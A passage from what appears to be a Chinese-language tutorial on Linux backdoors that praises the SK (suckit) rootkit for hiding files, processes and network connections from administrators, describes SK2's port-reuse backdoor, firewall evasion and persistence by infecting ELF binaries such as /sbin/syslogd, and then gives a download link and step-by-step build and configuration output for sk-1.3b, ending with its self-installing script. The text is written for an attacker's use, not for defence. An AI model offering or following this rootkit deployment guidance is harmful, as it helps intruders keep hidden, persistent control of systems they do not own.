4:sk采用动态隐藏的方式来隐藏指定的内容,包括文件,进程,网络连接 。为什么说是动态隐藏呢,因为当我们使用sk的客户端登录到安全之后,除了文件是根据prefix隐藏之外,其他的一切的操作都是隐藏的 。这个功能十分之方便,只要我们使用sk的客户端登录之后,就可以放心的操作了,不需要担心什么东西没有隐藏而被管理员发现 。相比之下,adore-ng这类rootkit就有点不人性化了,必须使用客户端手动的去隐藏指定的进程、网络和文件 。
5:sk的自动启动也十分隐蔽,它通过替换系统的init文件来实现自动启动,一般情况下非常难被发现 。
上面我们说的只是sk1.x的功能,sk2在sk1.x的基础上又有了如下的增强:
;1:后门的服务端和客户端集成在一个程序内,不得不提的是0x557的sam牛牛修改了putty作为sk2的客户端,这样将大大的方便了经常在windows下管理安全的朋友们了 。
2:端口回连后门升级为端口复用后门,可以复用系统大部分端口,包过滤防火墙在他面前几乎没有任何用处 。
3:自动启动方式完全改变,sk2可以感染系统的elf文件达到自启动的目的,比如我们可以感染/sbin/syslogd文件,在syslogd服务启动的同时,我们的sk2也启动了 。这个自启动方式是十分灵活也十分隐蔽的,就我所知,现在除了sk2之外,没有一个公开的后门或者rootkit是通过感染elf文件启动的 。如果想深入的了解ELF感染是如何实现和变幻的,请留意我的《ELF感染面面观》一文 。
4:增强了自身的加密功能,程序执行受到严格保护,没有密码将无法正确安装后门或者执行客户端 。
sk2虽然在功能上有了十分大的提高,但是公开版的sk2rc2还是存在一些说大不大说小不小的BUG的,具体有什么BUG我将在下一篇《Linux后门系列--由浅入深sk2完全分析》中一一透露 。
三、sk13的编译和使用
sk13的安装和使用很简单,只需要编译一次,sk就可以拿着到处使用了,下面给大家演示一下编译和使用的过程 。
1、编译
下载代码 http://www.xfocus.net/tools/200408/sk-1.3b.tar.gz
先配置一下参数:
以下是代码片段:
tthacker@wzt:~/sk# make skconfig
rm -f include/config.h sk login inst
make[1]: Entering directory `/root/sk/src"
make[1]: Leaving directory `/root/sk/src"
make[1]: Entering directory `/root/sk/src"
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.c
In file included from ../include/extern.h:9,
from ../include/stuff.h:18,
from crypto.c:7:
../include/skstr.h:20: warning: conflicting types for built-in function `vsnprintf"
../include/skstr.h:22: warning: conflicting types for built-in function `vsprintf"
../include/skstr.h:25: warning: conflicting types for built-in function `vsscanf"
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o pass
make[1]: Leaving directory `/root/sk/src"
/dev/null
Please enter new rootkit password: -->这里输入rookit的登录密码
Again, just to be sure:
OK, new password set.
Home directory [/dev/sk13]: /dev/sk13 -->这里设置隐藏的目录
Magic file-hiding suffix [sk13]: sk13 -->这里设置文件隐藏的前缀
Configuration saved.
>From now, _only_ this configuration will be used by generated
binaries till you do skconfig again.
To (re)build all of stuff type "make" -->现在我们可以开始编译了
tthacker@wzt:~/sk#make
这里省略N字,当我们看到下面的信息的时候,sk就编译好了
Okay, file "inst" is complete, self-installing script.
Just upload it somewhere, execute and you could log in using
./login binary.
Have fun!
推荐阅读
- 利用linux内核模块实现TTY hijacking
- Linux系统后门技术及实践
- 快速建立linux下的vpn服务器做加密代理
- Linux下防范缓冲区溢出攻击的系统安全策略
- 图 Mandrake Linux 9.0 beta + Vmware 安装
- 图 Linux下SSH密匙完美使用方法
- 小C13版来电显示人名的测试
- 实现Linux操作系统的自动登录
- Linux操作系统十大高级安全管理技巧
- 图 Linux操作系统打印机配置全攻略